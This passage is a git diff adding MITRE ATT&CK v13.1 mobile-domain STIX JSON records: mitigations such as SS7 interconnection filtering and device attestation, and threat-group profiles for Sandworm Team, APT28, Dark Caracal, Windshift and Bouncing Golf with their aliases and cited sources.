@@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--607fa945-7666-4b80-87b8-10305e49fcf1", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--e829ee51-1caf-4665-ba15-7f8979634124", + "type": "course-of-action", + "created": "2017-10-25T14:48:50.181Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1014", + "external_id": "M1014" + }, + { + "source_name": "CSRIC5-WG10-FinalReport", + "description": "Communications Security, Reliability, Interoperability Council (CSRIC). (2017, March). Working Group 10 Legacy Systems Risk Reductions Final Report. Retrieved May 24, 2017.", + "url": "https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Interconnection Filtering", + "description": "In order to mitigate Signaling System 7 (SS7) exploitation, the Communications, Security, Reliability, and Interoperability Council (CSRIC) describes filtering interconnections between network operators to block inappropriate requests (Citation: CSRIC5-WG10-FinalReport).", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--e944670c-d03a-4e93-a21c-b3d4c53ec4c9.json b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--e944670c-d03a-4e93-a21c-b3d4c53ec4c9.json new file mode 100644 index 0000000000000000000000000000000000000000..2549dc3751ed9ad2b56d9c6cb155ab9873a897d4 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--e944670c-d03a-4e93-a21c-b3d4c53ec4c9.json 
@@ -0,0 +1,34 @@ +{ + "type": "bundle", + "id": "bundle--eab8aec3-3b07-472a-9ea7-40b5e8dfe655", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "course-of-action", + "id": "course-of-action--e944670c-d03a-4e93-a21c-b3d4c53ec4c9", + "created": "2017-10-25T14:48:51.365Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1007", + "url": "https://attack.mitre.org/mitigations/M1007" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "Warn device users not to accept requests to grant Device Administrator access to applications without good reason.\n\nAdditionally, application vetting should include a check on whether the application requests Device Administrator access. Applications that do request Device Administrator access should be carefully scrutinized and only allowed to be used if a valid reason exists.", + "modified": "2022-04-06T14:47:19.714Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Caution with Device Administrator Access", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c.json b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c.json new file mode 100644 index 0000000000000000000000000000000000000000..10e212108efe41a606bde02134ee612f6fee254e --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c.json 
@@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--7101ac28-e61d-49ab-adb9-5ab50c9f24cd", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "type": "course-of-action", + "created": "2019-10-18T12:50:35.335Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1002", + "url": "https://attack.mitre.org/mitigations/M1002" + } + ], + "modified": "2019-10-18T14:52:53.019Z", + "name": "Attestation", + "description": "Enable remote attestation capabilities when available (such as Android SafetyNet or Samsung Knox TIMA Attestation) and prohibit devices that fail the attestation from accessing enterprise resources.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/identity/identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5.json b/cti-ATT-CK-v13.1/mobile-attack/identity/identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5.json new file mode 100644 index 0000000000000000000000000000000000000000..613369691e2ace1350968533d21315d81bfe28d5 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/identity/identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5.json @@ -0,0 +1,18 @@ +{ + "type": "bundle", + "id": "bundle--2a5226a7-8c87-49c0-af04-5385331a0983", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "type": "identity", + "identity_class": "organization", + "created": "2017-06-01T00:00:00.000Z", + "modified": "2017-06-01T00:00:00.000Z", + "name": "The MITRE Corporation" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--049cef3b-22d5-4be6-b50c-9839c7a34fdd.json b/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--049cef3b-22d5-4be6-b50c-9839c7a34fdd.json new file mode 100644 index 0000000000000000000000000000000000000000..0c35c90700c9e71975714f4c5a068deb971f563b --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--049cef3b-22d5-4be6-b50c-9839c7a34fdd.json @@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--c19523a1-29c9-4fb2-9f94-35ecf83cce7f", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Bouncing Golf" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--049cef3b-22d5-4be6-b50c-9839c7a34fdd", + "type": "intrusion-set", + "created": "2020-01-27T16:55:39.688Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0097", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0097" + }, + { + "source_name": "Trend Micro Bouncing Golf 2019", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign \u2018Bouncing Golf\u2019 Affects Middle East. Retrieved January 27, 2020." + } + ], + "modified": "2020-03-26T20:58:44.722Z", + "name": "Bouncing Golf", + "description": "[Bouncing Golf](https://attack.mitre.org/groups/G0097) is a cyberespionage campaign targeting Middle Eastern countries.(Citation: Trend Micro Bouncing Golf 2019)", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192.json b/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192.json new file mode 100644 index 0000000000000000000000000000000000000000..9e95fa0608bc2e7b871a3ce73c8441db0606e4d3 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192.json 
@@ -0,0 +1,141 @@ +{ + "type": "bundle", + "id": "bundle--25c8b390-60d5-44dc-8796-8860f9991f2b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:12:31.238Z", + "name": "Sandworm Team", + "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) is a destructive threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) This group has been active since at least 2009.(Citation: iSIGHT Sandworm 2014)(Citation: CrowdStrike VOODOO BEAR)(Citation: USDOJ Sandworm Feb 2020)(Citation: NCSC Sandworm Feb 2020)\n\nIn October 2020, the US indicted six GRU Unit 74455 officers associated with [Sandworm Team](https://attack.mitre.org/groups/G0034) for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide [NotPetya](https://attack.mitre.org/software/S0368) attack, targeting of the 2017 French presidential campaign, the 2018 [Olympic Destroyer](https://attack.mitre.org/software/S0365) attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical Weapons, and attacks against the country of Georgia in 2018 and 2019.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) Some of these were conducted with the assistance of GRU Unit 26165, which is also referred to as [APT28](https://attack.mitre.org/groups/G0007).(Citation: US District Court Indictment GRU Oct 2018)", + "aliases": [ + "Sandworm Team", + "ELECTRUM", + "Telebots", + "IRON VIKING", + "BlackEnergy (Group)", + "Quedagh", + "Voodoo Bear", + "IRIDIUM" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.0", + "x_mitre_contributors": [ + "Dragos Threat 
Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "created": "2017-05-31T21:32:04.588Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0034", + "external_id": "G0034" + }, + { + "source_name": "Voodoo Bear", + "description": "(Citation: CrowdStrike VOODOO BEAR)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "ELECTRUM", + "description": "(Citation: Dragos ELECTRUM)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Sandworm Team", + "description": "(Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014) (Citation: InfoSecurity Sandworm Oct 2014)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Quedagh", + "description": "(Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "IRIDIUM", + "description": "(Citation: Microsoft Prestige ransomware October 2022)" + }, + { + "source_name": "BlackEnergy (Group)", + "description": "(Citation: NCSC Sandworm Feb 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Telebots", + "description": "(Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "IRON VIKING", + "description": "(Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "description": "Brady, S . (2018, October 3). 
Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.", + "url": "https://www.justice.gov/opa/page/file/1098481/download" + }, + { + "source_name": "Dragos ELECTRUM", + "description": "Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.", + "url": "https://www.dragos.com/resource/electrum/" + }, + { + "source_name": "F-Secure BlackEnergy 2014", + "description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.", + "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf" + }, + { + "source_name": "iSIGHT Sandworm 2014", + "description": "Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html" + }, + { + "source_name": "CrowdStrike VOODOO BEAR", + "description": "Meyers, A. (2018, January 19). Meet CrowdStrike\u2019s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.", + "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/" + }, + { + "source_name": "Microsoft Prestige ransomware October 2022", + "description": "MSTIC. (2022, October 14). New \u201cPrestige\u201d ransomware impacts organizations in Ukraine and Poland. Retrieved January 19, 2023.", + "url": "https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/" + }, + { + "source_name": "InfoSecurity Sandworm Oct 2014", + "description": "Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian \u2018Sandworm\u2019 Hackers. Retrieved October 6, 2017.", + "url": "https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/" + }, + { + "source_name": "NCSC Sandworm Feb 2020", + "description": "NCSC. 
(2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.", + "url": "https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory" + }, + { + "source_name": "USDOJ Sandworm Feb 2020", + "description": "Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.", + "url": "https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html" + }, + { + "source_name": "US District Court Indictment GRU Unit 74455 October 2020", + "description": "Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.", + "url": "https://www.justice.gov/opa/press-release/file/1328521/download" + }, + { + "source_name": "Secureworks IRON VIKING ", + "description": "Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.", + "url": "https://www.secureworks.com/research/threat-profiles/iron-viking" + }, + { + "source_name": "UK NCSC Olympic Attacks October 2020", + "description": "UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.", + "url": "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--8a831aaa-f3e0-47a3-bed8-a9ced744dd12.json b/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--8a831aaa-f3e0-47a3-bed8-a9ced744dd12.json new file mode 100644 index 0000000000000000000000000000000000000000..8880c57f0530c27c35ab9f9bcc0547606fc1c609 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--8a831aaa-f3e0-47a3-bed8-a9ced744dd12.json 
@@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--7c82c6d4-75d3-4002-b424-04c96d5c74a2", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Dark Caracal" + ], + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--8a831aaa-f3e0-47a3-bed8-a9ced744dd12", + "type": "intrusion-set", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0070", + "external_id": "G0070" + }, + { + "source_name": "Dark Caracal", + "description": "(Citation: Lookout Dark Caracal Jan 2018)" + }, + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2021-10-11T19:08:18.503Z", + "name": "Dark Caracal", + "description": "[Dark Caracal](https://attack.mitre.org/groups/G0070) is threat group that has been attributed to the Lebanese General Directorate of General Security (GDGS) and has operated since at least 2012. (Citation: Lookout Dark Caracal Jan 2018)", + "x_mitre_version": "1.3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1.json b/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1.json new file mode 100644 index 0000000000000000000000000000000000000000..4eeae106648a248d6c3e0fb1d1fa1d9900703b63 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1.json 
@@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--9c5883ab-669e-4ed4-a2cb-a9a2447a22f2", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Windshift", + "Bahamut" + ], + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "type": "intrusion-set", + "created": "2020-06-25T17:16:39.168Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0112", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0112" + }, + { + "source_name": "Bahamut", + "description": "(Citation: SANS Windshift August 2018)" + }, + { + "source_name": "SANS Windshift August 2018", + "url": "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf", + "description": "Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020." + }, + { + "source_name": "objective-see windtail1 dec 2018", + "url": "https://objective-see.com/blog/blog_0x3B.html", + "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019." + }, + { + "source_name": "objective-see windtail2 jan 2019", + "url": "https://objective-see.com/blog/blog_0x3D.html", + "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019." 
+ } + ], + "modified": "2021-04-26T14:37:33.234Z", + "name": "Windshift", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) is a threat group that has been active since at least 2017, targeting specific individuals for surveillance in government departments and critical infrastructure across the Middle East.(Citation: SANS Windshift August 2018)(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c.json b/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c.json new file mode 100644 index 0000000000000000000000000000000000000000..13dc5bf1ee589eee7ddb0aae80a2c460b834ff6b --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c.json 
@@ -0,0 +1,228 @@ +{ + "type": "bundle", + "id": "bundle--7fc547b6-c94c-41ab-9743-392182aff60d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-26T17:51:20.401Z", + "name": "APT28", + "description": "[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: FireEye APT28 January 2017)(Citation: GRIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation: Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018)(Citation: ESET Zebrocy May 2019)\n\n[APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. (Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034). 
", + "aliases": [ + "APT28", + "IRON TWILIGHT", + "SNAKEMACKEREL", + "Swallowtail", + "Group 74", + "Sednit", + "Sofacy", + "Pawn Storm", + "Fancy Bear", + "STRONTIUM", + "Tsar Team", + "Threat Group-4127", + "TG-4127" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "4.0", + "x_mitre_contributors": [ + "S\u00e9bastien Ruel, CGI", + "Drew Church, Splunk", + "Emily Ratliff, IBM", + "Richard Gold, Digital Shadows" + ], + "type": "intrusion-set", + "id": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c", + "created": "2017-05-31T21:31:48.664Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0007", + "external_id": "G0007" + }, + { + "source_name": "SNAKEMACKEREL", + "description": "(Citation: Accenture SNAKEMACKEREL Nov 2018)" + }, + { + "source_name": "Fancy Bear", + "description": "(Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)" + }, + { + "source_name": "Tsar Team", + "description": "(Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)" + }, + { + "source_name": "APT28", + "description": "(Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)" + }, + { + "source_name": "STRONTIUM", + "description": "(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 
3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)" + }, + { + "source_name": "IRON TWILIGHT", + "description": "(Citation: Secureworks IRON TWILIGHT Profile)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)" + }, + { + "source_name": "Threat Group-4127", + "description": "(Citation: SecureWorks TG-4127)" + }, + { + "source_name": "TG-4127", + "description": "(Citation: SecureWorks TG-4127)" + }, + { + "source_name": "Pawn Storm", + "description": "(Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020) " + }, + { + "source_name": "Swallowtail", + "description": "(Citation: Symantec APT28 Oct 2018)" + }, + { + "source_name": "Group 74", + "description": "(Citation: Talos Seduploader Oct 2017)" + }, + { + "source_name": "Accenture SNAKEMACKEREL Nov 2018", + "description": "Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.", + "url": "https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50" + }, + { + "source_name": "Crowdstrike DNC June 2016", + "description": "Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.", + "url": "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.", + "url": "https://www.justice.gov/opa/page/file/1098481/download" + }, + { + "source_name": "GRIZZLY STEPPE JAR", + "description": "Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). 
GRIZZLY STEPPE \u2013 Russian Malicious Cyber Activity. Retrieved January 11, 2017.", + "url": "https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf" + }, + { + "source_name": "ESET Zebrocy May 2019", + "description": "ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.", + "url": "https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/" + }, + { + "source_name": "ESET Sednit Part 3", + "description": "ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.", + "url": "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" + }, + { + "source_name": "Sofacy DealersChoice", + "description": "Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/" + }, + { + "source_name": "FireEye APT28 January 2017", + "description": "FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.", + "url": "https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf" + }, + { + "source_name": "FireEye APT28", + "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA\u2019S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.", + "url": "https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf" + }, + { + "source_name": "Ars Technica GRU indictment Jul 2018", + "description": "Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. 
Retrieved September 13, 2018.", + "url": "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/" + }, + { + "source_name": "TrendMicro Pawn Storm Dec 2020", + "description": "Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm\u2019s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.", + "url": "https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html" + }, + { + "source_name": "Securelist Sofacy Feb 2018", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.", + "url": "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/" + }, + { + "source_name": "Kaspersky Sofacy", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.", + "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/" + }, + { + "source_name": "Palo Alto Sofacy 06-2018", + "description": "Lee, B., Falcone, R. (2018, June 06). Sofacy Group\u2019s Parallel Attacks. Retrieved June 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" + }, + { + "source_name": "Talos Seduploader Oct 2017", + "description": "Mercer, W., et al. (2017, October 22). \"Cyber Conflict\" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.", + "url": "https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html" + }, + { + "source_name": "Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020", + "description": "Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. 
